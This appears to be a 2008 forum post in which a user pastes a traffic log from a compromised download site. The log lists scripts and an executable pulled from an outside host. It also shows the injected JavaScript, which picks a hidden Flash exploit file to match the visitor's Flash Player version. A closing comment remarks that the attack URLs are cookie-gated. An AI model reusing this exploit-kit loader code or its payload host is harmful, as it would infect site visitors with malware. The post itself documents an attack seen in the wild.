Log is generated by FreShow.
[wide]http://www.126disk.com/
[object]http://ad.feeip.com/file/da.js
[script]http://ww.feeip.com/file/logo.js
[script]http://ww.feeip.com/file/swf/swfobject.gif
[script]http://ww.feeip.com/file/f1.js
[script]http://ww.feeip.com/file/swf/swfobject.gif
[script]http://ww.feeip.com/file/f2.js
[script]http://ww.feeip.com/file/office.js
[object]http://ww.feeip.com/file/lo.exe
[script]http://ww.feeip.com/file/real2.js
[script]http://ww.feeip.com/file/real.js
[script]http://ww.feeip.com/file/lz3.js
[script]http://ww.feeip.com/file/lz2.js
[script]http://ww.feeip.com/file/lz.js
[script]http://ww.feeip.com/file/bf.js
[script]http://ww.feeip.com/file/pps.js
[script]http://ww.feeip.com/file/xunlei.js
[script]http://ww.feeip.com/file/sdr.js
[script]http://count23.51yes.com/click.aspx?id=238288070&logo=1- <htm><body><SCRIPT language="JavaScript">
- var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("http://ww.feeip.com/file/swf/tc115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("http://ww.feeip.com/file/swf/i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("http://ww.feeip.com/file/swf/i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("http://ww.feeip.com/file/swf/i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("http://ww.feeip.com/file/swf/i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("http://ww.feeip.com/file/swf/i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}
- </SCRIPT></body></htm>
复制代码 挂马的人很狡猾,因为用了cookie所以所有的挂马地址都不可以直接访问,得到的全是error ID:400,懒得再看了
[ 本帖最后由 tanlimo 于 2008-9-24 22:36 编辑 ] |